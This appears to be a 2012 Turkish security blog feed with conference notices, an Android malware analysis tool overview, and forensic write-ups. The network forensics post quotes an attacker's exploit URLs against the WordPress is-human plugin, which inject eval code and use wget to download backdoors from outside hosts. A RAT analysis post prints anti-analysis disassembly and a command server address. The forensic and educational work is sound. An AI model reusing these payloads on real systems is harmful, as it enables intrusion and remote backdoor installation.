Hack 4 Career

NOPcon Bilgi Güvenliği Konferansı

M.S — Fri, 11 May 2012 07:51:46 +0000

21 Mayıs 2012 Pazartesi günü NOPcon Bilgi Güvenliği Konferansı‘nda, Android Uygulamalarında Güvenlik Testi konulu bir sunum gerçekleştireceğim, meraklılarına duyurulur :)

21 Mayıs 2012 Tarihinde Istanbul Bilgi Universitesi – Dolapdere kampüsünde, yerli ve yabancı alanında uzman araştırmacaların da sunumlarına yer verileceği NOPcon Bilgi Güvenliği Konferansı düzenlenecektir.

#Kimler katılmalı?
NOPcon, bilgi güvenliği/IT denetimi/network/sistem/yazılım departmanlarında ve sektöründe çalışanlara , tersine mühendislik(reverse engineering) , exploiting , vulnerability research, forensic vb hack/güvenlik konularına ilgi, merak duyan herkese hitap etmektedir.

**Katılım ücretsizdir ; http://www.nopcon.org/register/ adresinden kayıt olabilirsiniz.

#NOPcon Ana Konuları

Sınırlı kalmamakla birlikte genel olarak NOPcon sunumları aşağıdaki konuları kapsayacaktır :

Offensive Technologies (Saldırgan Güvenlik Teknolojileri):
- Exploit Geliştirme ve Bypass Mekanizmaları
- Malware
- Rootkit
- Cryptovirology

Defensive Technologies (Savunma Teknolojileri)
- Uygulama tabanlı güvenlik konuları
- Network tabanlı güvenlik konuları
- Kernel tabanlı güvenlik konuları

Embedded Device Hacking and Security (Gömülü Sistemler)
- Mobil güvenlik ve saldırı teknikleri (iphone, android, windows phone)
- Tablet, E-Reader güvenlik ve saldırı teknikleri

Vulnerability Research/Bug Hunting (Uygulama Güvenliği)
- Kaynak Kod Analizi
- Tersine Mühendislik
- Web uygulama güvenliği
- Fuzzing

Kritik Altyapı Sistemleri
- SCADA Hacking & Security
- Telekominikasyon Güvenliği
- Acil Durum Servisleri

Güvenlik TV Bölüm 9 – Ethical Hacking

M.S — Wed, 25 Apr 2012 15:05:30 +0000

Geçtiğimiz hafta Güvenlik TV’de Halil ÖZTÜRKCİ ve Sertan KOLAT ile Ethical Hacking konusunu ele aldık. Hacker’ın etiği olur mu? Etik Hacker nasıl olunur? Sertifikalı Hacker kimlere denir? Sertifikalı Hacker olmak için neleri bilmek gerekir? Penetrasyon testleri yapan firmaların akreditasyonu olmalı mı? Hangi eğitim alınmalı? Network Pentest ve Web Application Pentest aynı kişi tarafından yapılabilir mi? Bütün bu soruları ve daha bir çok konu başlığını ele aldığımız bu keyifli sohbeti umarım sizler de keyifle izlersiniz, herkese keyifli seyirler dilerim.

(Videoyu tam ekran izleyebilmek için iki defa üzerine basmanız yeterlidir)
Videoyu oynat
(Linux kullanıcısı iseniz videoyu izlemek için buraya tıklayın)

Anti Analiz

M.S — Mon, 23 Apr 2012 09:03:15 +0000

Yakın bir arkadaşım ile 12 Nisan tarihinde Namık Kemal Üniversitesi’ne bağlı Çorlu Mühendislik Fakültesi’nde gerçekleşen İnternet Haftası etkinliğinden dönerken bana 1 saat önce kendisine ulaşan e-postayı gösterdi. E-postanın konu başlığı (“Bakalım bunu nasıl açıklayacaksın!!!!) ve içeriği (“Nokia Fotoğraflar.rar”) şüpheli olduğu için arkadaşıma e-postayı bana göndermesini ilettikten sonra mümkün olan en kısa zamanda analiz için işe koyuldum.

Gelen e-posta SPAM kategorisin girmediği için direk gelen kutusuna gelmişti. E-posta, HTML içeriğe sahip olduğu için eklenti adı ve eklentiye ait resim güzel bir şekilde konumlandırılmıştı ve bu nedenle dikkatsiz bir kullanıcı tarafından ilk bakışta eklentinin Gmail’de olduğu düşünülebilirdi. E-postanın başlık bilgilerine (headers) dikkatlice bakılınca HTML kodlar ve eklentinin bulunduğu kısaltılmış (bit.ly) web adresi dikkat çekiyordu.

Nokia_Fofoğraflar.rar dosyasını indirip açtıktan sonra içinden çıkan 2 yazılımın (DSC0025.exe ve DSC0027.exe) PE başlık bilgilerinde yer alan zaman damgaları 10.04.2012 12:47:51 tarihini gösteriyordu.

İki yazılımın ortak özelliklerinden biri çalıştırılır çalıştırılmaz ekrana aşağıdaki resmi çıkartıyor olmasıydı.

Bu iki yazılımın kullanmış olduğum antivirüs yazılımı tarafından tespit edilmemiş olması zararlı yazılım oluşturan kişiler arasında sıkça tercih edilen Crypter (şifreleme) aracı ile yazılımların oluşturulduğu şüphesini uyandırdı.
Virustotal üzerinden 42 farklı Antivirüs yazılımı ile bu iki yazılımı tarattığımda sadece 2 tanesi bu zararlı yazılımları tanıyabiliyordu.

Boyutu diğerine kıyasla daha ufak olan DSC0027.exe yazılımını sanal makine içinde Immunity Debugger aracı ile dinamik olarak analiz ettiğimde yazılımın 2004 yılından kalma Flux RAT olduğunu (flServ.exe adı altında çalışmaktadır), kendinisini explorer.exe içine enjekte ettiğini ve Vodafone 3G IP bloğunda yer alan 46.155.243.4 dinamik ip adresi (*****.zapto.org) ile 2001 numaralı bağlantı noktası üzerinden haberleşmeye çalıştığı rahatlıkla anlaşılıyordu.

Ancak DSC0027.exe adındaki diğer zararlı yazılımı incelediğimde sanal makine içinde çalışmadığı gibi Anubis ve benzeri online kum havuzu (sandbox) hizmetleri tarafından da analiz edilemiyordu. Günümüzde çoğu zararlı yazılımı oluşturan ana yazılımların oluşturdukları zararlı yazılımın sanal makinelerde ve kum havuzu araçlarında çalıştırılmaya karşı ek kontroller barındırdığı düşünüldüğünde çalışmamasının başka bir nedeni olabileceğini pek düşünmemiştim.

Norman Malware Debugger PRO aracı ile zararlı yazılımı incelediğimde az önce bahsetmiş olduğum kontrollerin yazılım üzerinde mevcut olduğuna dair bilgilendirme mesajları ile karşılaştım.

Zararlı yazılımı Immunity Debugger ile detaylı olarak incelediğimde bu yazılımın aslında CyberGate RAT (cyber_server.exe adı altında çalışmaktadır) olduğu ve Norman Malware Debugger PRO aracının belirtmiş olduğu gibi üzerinde birçok anti analiz kodlarını (vmware, virtualbox, anubis, debugger vb.) yer aldığı açıkça görülüyordu.

Virtual PC
00407726 0F DB 0F ; Virtual PC Kontrolü
00407727 3F DB 3F ; CHAR ‘?’
00407728 07 DB 07

VMWare
004076CD . B8 68584D56 MOV EAX,564D5868
004076D2 . BB 12F76C3C MOV EBX,3C6CF712
004076D7 . B9 0A000000 MOV ECX,0A
004076DC . 66:BA 5856 MOV DX,5658

SyserDebugger Kontrolu
00407D53 . B8 847D4000 MOV EAX,cyber_se.00407D84 ; ASCII “\\.\Syser”
00407D58 . E8 C7FFFFFF CALL cyber_se.00407D24
00407D5D . 84C0 TEST AL,AL
00407D5F . 75 1C JNZ SHORT cyber_se.00407D7D
00407D61 . B8 907D4000 MOV EAX,cyber_se.00407D90 ; ASCII “\\.\SyserDbgMsg”
00407D66 . E8 B9FFFFFF CALL cyber_se.00407D24
00407D6B . 84C0 TEST AL,AL
00407D6D . 75 0E JNZ SHORT cyber_se.00407D7D
00407D6F . B8 A07D4000 MOV EAX,cyber_se.00407DA0 ; ASCII “\\.\SyserBoot”

Piyasada yer alan çoğu zararlı yazılımın yıllardır aynı anti analiz kodlarını içerdiği düşünüldüğünde bu kodlar üzerinde bol bol pratik yapmış olan zararlı yazılım analisti için bu kontrolleri tespit etmek ve aşmak sadece birkaç dakika sürmektedir.

Bu tür kodların kullanım amacı her ne kadar zararlı yazılım analistinin işini zorlaştırmak olsa da motive olmuş bir zararlı yazılım analistini bu tür kontroller ile durdurmak hiçbir zaman mümkün değildir.

Bu vesileyle herkesin 23 Nisan Ulusal Egemenlik ve Çocuk Bayramı’nı kutlar bir sonraki yazıda görüşmek dileğiyle herkese güvenli günler dilerim…

Android 4.0 Yüz Kilidi Nasıl Aşılır ?

M.S — Wed, 18 Apr 2012 20:09:01 +0000

Bildiğiniz üzere Android 4.0 (Ice Cream Sandwich) yüz tanıma özelliği ile birlikte gelmekte ve ekran kilidini açma unsuru olarak yüzünüz de (yüz kilidi) kullanılabilmektedir ancak yüzünüz yerine yüzünüzün yüksek çözünürlüklü bir fotoğrafının kullanılması durumunda da ekran kilidi açılmakta ve ortaya bir güvenlik zafiyeti çıkmaktadır. Google tarafından da belirtildiği üzere düşük güvenlik seviyesine sahip bu yüz kilidinin, telefonlarının güvenliğine önem verenler tarafından kullanılmaması şiddetle tavsiye edilir.

Google tarafından belirtilen ekran kilitlerinin güvenlik seviyeleri aşağıda yer almaktadır;

Sifre: Yüksek güvenlik
Pin: Orta ve Yüksek güvenlik
Model – Orta güvenlik
Yüz kilidi – Düşük güvenlik

Bilgi güvenliği farkındalığını arttırma adına çalışma arkadaşım Cem ÖNAL ile birlikte eğlenceli bir video hazırladım, herkese keyifli seyirler dilerim.

(Videoyu tam ekran izleyebilmek için iki defa üzerine basmanız yeterlidir)
Videoyu oynat
(Linux kullanıcısı iseniz videoyu izlemek için buraya tıklayın)

Ağ Trafiğinde Adli Bilişim Analizi

M.S — Sun, 18 Mar 2012 13:27:30 +0000

Network Forensics, Türkçe meali ile bilgisayar ağlarında adli bilişim, temel olarak ağ trafiğinin analiz edilmesine dayanmaktadır. Post-mortem (olay/vaka sonrası) gerçekleştirilebilmesi nedeniyle analiz için ateş duvarı (firewall), saldırı tespit/engelleme sistemi (ids/ips), bal küpü (honeypot) vb. ağ trafik kaydı tutan cihazların ve sistemlerin kayıtlarına ihtiyaç duyulmaktadır. Kayıtların analizi için Snort, ngrep, tcpdump, NetworkMiner, Wireshark, tcpxtract, Netwitness Investigator, Xplico vb. çeşitli yazılımlardan faydalanılmaktadır.

Bilgi Güvenliği AKADEMİSİ, Şubat ayında tamamı internet üzerindeki bal küpü (honeypot) / CTF sistemlerinden elde edilmiş ~20 GB’lık(5 DVD) trafik dosyalarını konuya meraklı sektör çalışanlarıyla paylaşma kararı aldı. Ben de bahsi geçen meraklılardan biri olarak Ömer ALBAYRAK’dan temin ettiğim DVDler’de yer alan dosyalara kısaca göz atmaya ve başarılı olan sızma girişimlerinden birini (geri kalanlarını meraklılara bırakıyorum) tespit etmeye karar verdim.

Her biri yaklaşık 1 GB olan 20 tane PCAP dosyasında, başarılı olan sızma girişimlerini aramanın samanlıkta iğne aramaktan farklı olmayacağını düşünerek daha akılcı bir yol izleyerek elimdeki tüm PCAP dosyalarını Snort saldırı tespit sistemine yönlendirmenin işlerimi kolaylaştıracağı düşüncesi ile sanal makineye üzerinde Snort, nmap, Nessus ve birçok açık kaynak kodlu ağ güvenliği uygulamalarını barındıran Network Security Toolkit (NST) işletim sistemini kurdum.

Normal şartlarda elimde boyut olarak ufak ve sayıca az PCAP dosyaları olmuş olsaydı, Backtrack 5 R2 işletim sistemi üzerinde yer alan Wireshark, tcpdump ve ngrep gibi araçlar ile analizi rahatlıkla gerçekleştirebilirdim.

NST işletim sistemini sanal makineye kurduktan ve Snort servisini çalıştırdıktan sonra sıra 20 adet PCAP dosyasını bu sisteme gönderecek (packet replay) aracı bulmaya ve kullanmaya gelmişti. Bunun için daha önce birçok testte kullanmış olduğum Colasoft’un Packet Player aracını kullanmaya karar verdim. NST otomatik olarak ağ bağdaştırıcılarını (network adapters) promiscuous kipte (mode) başlattığı için paketleri bu araç ile Snort kurulu NST sistemine göndermeye başladım.

4 saatten fazla süren paket gönderim işlemi tamamlandıktan sonra Snort tarafından üretilen alarmlar analiz edilmeye hazır hale geldi.

Saldırganlar ve saldırıya uğrayan sistemler hakkında en ufak bir fikrim olmadığı için en çok tekil alarm üreten hedef ve kaynak ip adresleri üzerine yoğunlaştığımda hedef olarak bir ip adresi (potansiyel sunucu), kaynak olarak ise bir kaç ip adresi (potansiyel saldırganlar) ortaya çıktı.

ngrep aracı ile Snort üzerinde tespit edilen potansiyel saldırgan ip adreslerini her bir PCAP dosyasında ayrı ayrı aramamak adına diğer bir sanal makinede kurulu olan Backtrack 5 R2 işletim sistemi üzerinde Wireshark aracı ile birlikte gelen mergecap aracı ile hepsini tek bir dosyaya çevirdim.

Ardından tespit edilen potansiyel saldırgan ip adresleri arasında en çok tekil alarm üreten ip adresini (195.174.37.105) ngrep ile CTF.pcap dosyasında yer alan TCP paketlerinde (UDP paketlerini göz ardı ettim) aratarak sızma girişimi hakkında detaylı bilgi edinmeye başladım.

95.173.186.116 (saldırıya uğrayan sunucu):

İşletim sistemi CentOS
Üzerinde Apache 2.2.3 ve PHP v5.1.6 ve WordPress bulunuyor.

195.174.37.105 (potansiyel saldırganlardan biri):

İlk olarak 29.05.2011 tarihinde saat 08:18′de sunucu ile bağlantı kuruyor.
İlk olarak 29.05.2011 tarihinde saat 08:29′da sunucuyu Nikto v2.1.4 ile tarıyor.
29.05.2012 tarihinde saat 20:44′de WordPress’in is-human eklentisinde bulunan zafiyeti istismar ederek sistem üzerinde uzaktan komutlar çalıştırıyor.
29.05.2012 tarihinde saat 21:33′de wget aracı ile Packetstorm sitesinden 60000. bağlantı noktasında (port) dinleyen bindshell-unix arka kapısı indiriyor ancak arka kapıya bağlandıktan sonra komut sonrasına noktalı virgül koymadığı için (ls -al;) arka kapının çalışmadığını sanıyor. ( /wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(stripslashes($_GET[a]));
error&a=echo%20%22%3Cpre%3E%22;system(%27cd%20/tmp;wget%2 0http://dl.packetstormsecurity.net/groups/synnergy/bindshell-unix%20xxx.pl%27); )
Bu defa 29.05.2012 tarihinde saat 21:47′de wget aracı ile Vigasis isimli bir siteden 16667 numaralı bağlantı noktasında (port) dinleyen evil.c arka kapısını indiriyor, derliyor, çalıştırıyor ve sisteme bağlanıyor. ( /wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(stripslashes($_GET[a]));error&
a=echo%20%22%3Cpre%3E%22;system(%27cd%20/tmp;wget%20http://www.vigasis.com/evil.c.txt%20-o%20evil.c%27); )
Daha sonra çeşitli yetki yükseltmeye yarayan çekirdek istismar araçlarını denese de root yetkisine sahip olamıyor ve kayıt sonlanıyor.

Sonuç itibariyle ağ trafik kayıtlarını analiz ederek başarılı bir sızmanın nasıl gerçekleştirildiği konusunda çok detaylı bilgiler elde edebilirsiniz. Umarım meraklı arkadaşlar için gerçekleştirmiş olduğum bu analiz faydalı olmuştur. Pratik yapmak isteyenlerin BGA’dan bu DVDler’i ücretsiz olarak temin etmelerini şiddetle tavsiye ederim. (Sınırlı sayıda bulunan DVD’ler tükenmiştir. Kayıt dosyalarını edinmek isteyenler BGA İstanbul ofisine giderek DVD çekimi yapabilirler.)

Bir sonraki yazıda görüşmek dileğiyle herkese güvenli günler dilerim.

Euroforensics 2012 Adli Bilimler Konferansı ve Sergisi

M.S — Mon, 05 Mar 2012 07:45:33 +0000

31 Mart Cumartesi günü Euroforensics 2012 Adli Bilimler Konferansı ve Sergisinde, Saat 11:00′da, Fevzi Çakmak salonunda, Android Zararlı Yazılım Analizi üzerine bir sunum gerçekleştireceğim, meraklılarına duyurulur :)

Euroforensics 2012 Adli Bilimler Konferansı ve Sergisi, 29 – 31 Mart 2012 tarihlerinde İstanbul Harbiye Askeri Müze ve Kültür Sitesi’nde gerçekleştirilecektir. EuroForensics etkinliği adli bilişim, adli tıp ve adli muhasebe ürünlerini, hizmetlerini ve konu ile ilgili tüm profesyonelleri bir araya getiren bir platformdur.

Euroforensics Konferansı esnasında adli bilişim, adli muhasebe, adli tıp ve olay yeri inceleme konularında eş zamanlı oturumlar düzenlenmektedir. Adli Bilişim oturumlarında ; bilgisayar inceleme, internet güvenliği , siber terörizm, siber güvenlik,şifre kurtarma, ses ve video inceleme, biyometri, doküman inceleme, bilgi güvenliği, istihbarat toplama , kriptoloji , mobil inceleme yer alan konulardan bazılarıdır. Adli muhasebe oturumlarında ; Hile ve suistimali önleme, internet bankacılık suistimalleri, kara para aklama, Adli Tıp oturumlarında ise DNA analizi, olay yeri inceleme yer alan konulardan bazılarıdır.

Konferans esnasında kolluk kuvvetlerine özel bir gün ayırılacaktır. Bu özel gün içerisinde ziyaretçiler görevleri ve kurumları göz önünde bulundurularak katılabilecekleri iki mikro konferans düzenlenecektir. 1. Uluslararası Siber Savaş,Terör ve Suçla Mücadele Konferansı; Mevcut siber tehditler ve önlenme stratejileri, yakın gelecekte karşılaşılabilecek siber tehditler, siber suçlardaki son trendler, offensive güvenliğin zorlukları, sosyal ağların soruşturulması ve incelenmesi konferans dahilindeki konu başlıklarından bazılarıdır. 1.Uluslararası Olay Yeri İnceleme Konferansı; Touch DNA Analizi , adli fotoğrafçılık , olay yerinin yeniden canlandırılması konferans dahilindeki konu başlıklarından bazılarıdır.

Euroforensics 2012 etkinliği T.C. Başbakanlığı TİKA (Türk İşbirliği ve Kalkınma İdaresi Başkanlığı), T.C. Bilgi Teknolojileri ve İletişim Kurumu (BTK), ISACA Istanbul Chapter, Türkiye Etik ve İtibar Derneği (TEID), Emniyet Genel Müdürlüğü Kriminal Polis Laboratuvarları, Bankalararası Kart Merkezi, Türkiye Bankalar Birliği ve Adli Tıp Kurumu tarafından desteklenmektedir.

Etkinliğe katılmak isteyenler derya@forensicpeople.com email adresine email gönderebilirler.

Android Zararlı Yazılım Analizi

M.S — Sat, 25 Feb 2012 17:15:28 +0000

2011 yılının son aylarında güvenlik firmaları tarafından yayınlanan mobil tehdit raporlarında Android işletim sisteminin rakiplerine göre çok daha fazla zararlı yazılım istilasına uğradığına dikkat çekiliyordu. Juniper firması tarafından yapılan araştırmaya göre 2009 ile 2010 yılları arasında akıllı telefonları hedef alan zararlı yazılımların %250 artış gösterdiği, 2011 yılının Temmuz ayı ile Kasım ayı arasında ise %472 artış gösterdiği sonucu ortaya çıkıyordu. Juniper firması tarafından yayınlanan bir başka raporda ise 2011 yılının son 7 ayında Android işletim sistemini hedef alan zararlı yazılımlardaki artışın %3,325 olduğu belirtiliyordu!

Gartner’ın yapmış olduğu bir araştırmaya göre 2011 yılının son çeyreğinde satılan her iki akıllı telefondan birinde Andoid işletim sisteminin kurulu olduğu göz önünde bulundurulduğunda art niyetli kişiler tarafından geliştirilen zararlı yazılımların Android işletim sistemini hedef almasına eminim sizde benim gibi şaşırmıyorsunuzdur.

Android işletim sistemi neden bu kadar kişi ve üretici tarafından tercih ediliyor diye soracak olursanız bunların başında açık kaynak kodlu olması, ücretsiz olması, açık markete (ücretsiz uygulamalar barındıran Android Market) sahip olması, tabii ki Linux 2.6 çekirdeğini kullanıyor olmasının çok büyük rol oynadığını söyleyebiliriz. Durum böyle olunca da bireylerden kurumlara kadar herkesin yeri geldiğinde kullandığı veya kulkanacağı uygulamanın iyi niyetinden şüphe ettiği durumlarda o uygulamayı analiz etmeye ihtiyaç duyabilir.

Analiz yöntemlerine geçmeden önce kısaca Android’in güvenlik modelinden kısaca bahsetmek istiyorum.

Android işletim sisteminde Linux işletimin güvenlik modeli baz alınmıştır. Linux işletim sisteminde bildiğiniz üzere dosyalara verilen izinler kullanıcı bazlıdır ve bir kullanıcı başka bir kullanıcının dosyasını o kullanıcı izin vermediği sürece okuyamaz, değiştiremez ve/veya çalıştıramaz. Android işletim sisteminde de her yeni kurulan uygulamayı yeni bir kullanıcı olarak düşünebilirsiniz. Bir uygulama, diğer bir uygulamaya ait dosyalara dosya sistemi üzerinden ulaşamaz.
Uygulamaların kurulabilmesi için mutlaka dijital sertifika ile (kendinden imzalı (self-signed) da olabilir) imzalanmış olması gerekmektedir.
Uygulamalar çalışma esnasında kullanacakları kaynaklara, erişecekleri alanlara göre kurulum esnasında kullanıcıdan bir defaya mahsus olmak üzere izin istemek zorundadırlar. Örneğin bir uygulama, çalışabilmesi için internet bağlantısına ihtiyaç duyuyor ise kurulum esnasında bunu beyan etmek ve kullanıcıdan bu izni istemek zorundadır. İzinler, APK (Android application package) içinde yer alan AndroidManifest.xml dosyası içinde tanımlanmaktadır.
Kurulan her bir uygulama ayrı bir Dalvik sanal makinesinde çalışmaktadır.

Peki zararlı bir yazılım, Android işletim sistemine hangi yollarla bulaşabilir ?

Uzaktan kurulum ile: Android Market web sayfası üzerinden cep telefonunuza seçtiğiniz herhangi bir uygulamayı yükleyebilirsiniz. Art niyetli bir kişi tarafından Gmail şifrenizin çalındığını ve isterse bu şifre ile cep telefonunuza internet bankacılığına giriş yaparken kullandığınız tek kullanımlık SMS mesajlarını çalan bir truva atını yükleyebileceğini düşündüğünüzde ister istemez bu özellik sizi korkutuyor.
Market üzerinden: Bildiğiniz üzere Android Market’e isteyen herkes (25$ ödeyerek sahip olunan bir geliştirici hesabı yeterlidir) geliştirmiş olduğu uygulamayı yükleyebilmekte ve kullanıcıların kullanımına sunabilmektedir. Durum böyle olunca da hangi uygulama güvenilir hangisi değil bunu anlamak pek mümkün olmamamaktadır. Her ne kadar Google bu duruma bir dur demek için Bouncer adında ki zararlı uygulama tarayıcı hizmetini devreye almış olsa da, Apple gibi manuel olarak kod incelemesi yapmadığı sürece zararlı yazılımlar Android Market’i istila etmeye devam edecektir.
Android SDK ile: Android SDK, Google tarafından uygulama geliştiricileri (developer) için hazırlanmış ve bünyesinde kütüphaneleri ve hata ayıklayıcı (debugger), öykünücü (emulator) gibi çeşitli araçları barındıran bir yazılım geliştirme kitidir. Bu kit içerisinde yer alan Android Debug Bridge (adb) aracı ile öykünücüye (emulator) veya bağlı olan Android işletim sistemi kurulu cihaza uygulama yüklemek mümkündür.
Internet üzerinden: Web sayfası üzerinden, e-posta eklentisi veya QR kodu ile internet üzerinden indirilen apk dosyası ile Android işletim sistemine uygulama yüklemek mümkündür.

APK uzantısına sahip olan Android uygulamaları zip dosya formatına sahiptir ve bu sayede APK uzantılı herhangi bir dosyanın uzantısı ZIP uzantısı olarak değiştirilerek Winzip, Winrar ve benzer dosya sıkıştırma araçları ile açılabilmektir. APK dosyasının açılması durumunda içinden çıkan classes.dex ve AndroidManifest.xml dosyaları analiz için önem taşıyan dosyalardır.

Dex uzantılı classes dosyası, Java ile kodlanmış, Java derleyicisi ile derlenmiş ve dex aracı ile Dalvik sanal makinesinde çalışacak hale dönüştürülmüş Android uygulamasıdır. Piyasada dex dosyasını class dosyasına çeviren dex2jar gibi ücretsiz araçlar mevcuttur. Bu araçlar ile kaynak koduna çevrilen (örnek komut: d2j-dex2jar.bat classes.dex) class dosyası rahatlıkla analiz edilebilir.

Bildiğiniz veya bilmediğiniz üzere Java ile kodlanmış programlar kaynak koduna çevrilerek (decompile) analiz edilebilmektedir. Durum böyle olunca da dex formatından class formatına dönüştürülen Android uygulamasını JD-GUI ve benzer araçlar ile kaynak koduna geri çevirmek ve analiz etmek mümkündür.

Kimi zaman kaynak koduna çeviren araçlar (decompiler) hatalı çeviri yaparlar. Bu gibi durumlarda dex dosyası, apktool gibi araçlar ile tersine çevrilerek (disassembling) (örnek komut: java -jar apktool.jar d BloodvsZombie_com.gamelio.DrawSlasher_1_1.0.1.apk) analiz edilebilmektedir.

İzinlere gelecek olursak daha önce de belirttiğim gibi izinler AndroidManifest.xml dosyasında tanımlanmaktadır ancak bu dosya binary formatında olduğu için herhangi bir metin editörü ile görüntülenememektedir bu nedenle AXMLPrinter2.jar gibi araçlar ile okunaklı hale getirilmesi (örnek komut: java -jar AXMLPrinter2.jar AndroidManifest.xml) gerekmektedir. Okunaklı hale getirildikten sonra uygulamanın çalışabilmesi için ihtiyaç duyduğu izinler rahatlıkla analiz edilebilmektedir.

Statik analiz için yukarda bahsetmiş olduğum araçlara ilave olarak IDA Pro v6.1+, APKInspector, Dexdump, Smali ve Androguard araçlarından da faydalanabilirsiniz.

Dinamik analiz gerçekleştirmek için Android SDK ile birlikte gelen öykünücüden (emulator) faydalanabilirsiniz ancak zararlı yazılımın servis olarak çalışması ve/veya bazı işlemlerin gerçekleşmesi esnasında çalışma durumu söz konusu olabileceği için görsel ve/veya fonksiyonel olarak öykünücü içinde çalıştırsanız dahi size herhangi bir ipucu vermeyebilir. Bu gibi ihtimallere karşı Droidbox aracından faydalanabiliriz. Droidbox, Android uygulamalarını dinamik olarak analiz etmek için geliştirilmiş bir kum havuzu aracıdır. Gelen/giden ağ verileri takibinden, dosya okuma/yazma takibine, Giden SMS ve arama takibinden, sifreleme işlemlerinin takibine kadar sistem üzerinde gerçekleştirilen kritik işlemleri kayıt altına alarak zararlı yazılımın arka planda neler yaptığını rahatlıkla öğrenebilirsiniz.

Görüldüğü üzere Android işletim sistemini hedef alan zararlı yazılımları analiz edebilmek için statik olsun dinamik olsun faydanalabileceğimiz çok sayıda araç bulunmaktadır ve Google, Android Market’e yüklenen araçları manuel olarak kaynak kod seviyesinde analiz etmemeye devam ettiği sürece bu araçlara çok işimiz düşecektir.

Güvenliğiniz için Android işletim sisteminize mutlaka ama mutlaka bir güvenlik uygulama kurmanızı önerir, bir sonraki yazıda görüşmek dileğiyle herkese güvenli günler dilerim.

Netsec Topluluk Buluşması/ Siber Savaş Aracı Olarak Kötücül Yazılımlar

M.S — Wed, 22 Feb 2012 06:25:16 +0000

NetSec Ağ ve Bilgi Güvenliği Topluluğu 25 Şubat 2012′de “Siber Savaş Aracı Olarak Kötücül Yazılımlar” konusunda bilgi paylaşımı ve tanışma amaçlı Microsoft Türkiye sponsorluğunda Bellevue Residence’da buluşuyor.

Buluşmada “Social Network Malware Attacks – Sosyal ortamlarda karşılaşılan kötücül yazılımlar”, ”Android dünyasının zararlı yazılımları”, ”Kötücül Yazılımlar (malware) analizinde kullanılan temel yöntem ve araçlar”, “Dinamik analiz araçlarının modern malware ile imtihanı”, ve “dünyada kötücül yazılımların yayılması ile ilgili olarak yapılan araştırma sonucu oluşan SIR raporu ” konulu 5 farklı sunum yapılacaktır.

Buluşmanın temel amacı bilgi güvenliği sektörü çalışanlarının biraraya gelip tanışması, iş birliktelerini arttırması ve bilgi paylaşımıdır.

Etkinlik CISSP sertifikası sahipleri için 4 CPE değerindedir.

Etkinlik Adı	Netsec Topluluk Buluşması / Siber Savaş Aracı Olarak Kötücül Yazılımlar
Düzenleyen	NetSec Topluluğu, Bilgi Güvenliği AKADEMİSİ
Sponsor	Microsoft Türkiye
Tarih/Saat	25 Şubat 2012 Cumartesi Saat 12:30-17:00
Yer
Kayıt	Etkinliğe kayıt olmak şartıyla tüm bilgi güvenliği uzmanları, meraklıları katılabilir.
Katılımcıya Kazançları	Sektör içinde çalışanlar ile tanışma, güncel siber tehditler konusunda bilgi alışverişi, iş birliği venetwork oluşturma.
Hedef Kitle	Bilgi güvenliği yöneticileri Ağ ve güvenlik mühendisleri Hosting firmaları/ISP’ler Telekom firmaları Kamu kurum ve kuruluşları Yazılımcılar
Ücret – Kontenjan	Etkinliğimiz ücretsiz olup etkinlik için kontenjan sınırlıdır. Lütfen katılım durumunuz kesinse kayıt olunuz.
Etkinlik Programı	12:30-13:00 Tanışma ve Etkinlik Açılış Konuşması 13:00-13:30 Microsoft Security Intelligence Report (SIR) 13:30-14:15 Malware Analizinde Kullanılan Temel Yöntem ve Araçlar Huzeyfe ÖNAL / BGA 14:15-14:30 ARA 14:30-15:15 Android Zararlı Yazılım Analizi Mert SARICA /IBTech 15:15-16:00 Social Network Malware Attacks Halil ÖZTÜRKCİ / ADEO 16:00-16:15 ARA 16:15-17:00 Dinamik Analiz Araçlarının Modern Malware ile İmtihanı Osman PAMUK / TÜBİTAK

İletişim için lütfen bilgi@lifeoverip.net adresine e-posta gönderiniz..

Ulaşım

Bellevue Residence Levent Mahallesi, Aydın Sokak. No:7 Levent, 34340 İstanbul/Türkiye

Zararlı PDF Analizi

M.S — Mon, 23 Jan 2012 23:36:35 +0000

Eskiden art niyetli olsun veya olmasın bilgisayar korsanlarının hedef sistemlere sızmalarının arkasında yatan başlıca sebepler; hacktivism gayesiyle dünyaya mesaj verme, finansal fayda sağlamak amacıyla finansal bilgilere erişme, sistemde tespit edilen güvenlik zafiyetleri konusunda sistem yöneticilerini uyarma, kin ve nefret güdüleriyle hareket ederek hedef sistemlere zarar vermekti. Ancak zaman değişti ve uluslar, bilgisayar korsanlarından oluşan kendi siber kuvvetlerini oluşturarak hackingi bir silah olarak diğer devletlere karşı kullanmaya başladılar.

Siber savaşın yaşandığı günümüzde çoğunlukla izlenen strateji zarardan çok kalıcı olarak hedef sistemlerde barınmaya çalışma ve olabildiğince hassas bilgilere ulaşma yönünde oluyor ve çoğunlukla arkasında ulusların olduğuna inanılan bu sızmalara Advanced persistent threat (APT) adı veriliyor. Her ne kadar APT tehditlerinin arkasında çoğunlukla çok iyi organize olmuş bir grubun, ulusun olduğuna ve sızmalarda ileri seviye zararlı yazılımlardan ve sofistike araçlardan faydalandıkları düşünülse de aslında RSA vakasında olduğu gibi sahte bir e-posta hazırlama becerisi, ofis dokümanlarını açmak için kullanılan bir uygulamada Fuzzer ile güvenlik zafiyeti keşfetme becerisi, bu zafiyeti istismar edecek kod parçasını (exploit) hazırlama becerisi ve son olarak kaynak kodlarına internette rastlayabileceğiniz bir aracı özelleştirme (örnek: modifiye edilmiş poison ivy) becerisi yeterli olmaktadır. Hele ki günümüzde bu işlerin nasıl yapılabileceğini anlatan sayısız makale olduğu düşünüldüğünde sıradan bir kurum için bile bu tehditin gerçekleşme olasılığı oldukça yüksek seviyelere çıkmaktadır.

Çoğunlukla ABD Savunma Sanayii şirketlerini hedef alan Çin’li grubun, sistemlere sızmak ve gizli belgeleri çalmak için kullandıkları Sykipot adındaki zararlı yazılımı bulaştırmak için 2007 yılından bu yana şirket çalışanlarına, zafiyete sahip istismar kodu içeren ofis dokümanları gönderdikleri ve bu yöntemin bir çok organize suç örgütü tarafından da kullanıldığı düşünüldüğünde genel kabul görmüş güvenlik kontrollerinin (ips, antivirüs, vs.) yetersiz olduğu anlaşılmaktadır. Durum böyle olunca da kullanıcılardan gelen ihbarlar doğrultusunda olası zararlı kod içeren ofis dokümanlarının analiz edilmesi bir kurum için kaçınılmazdır.

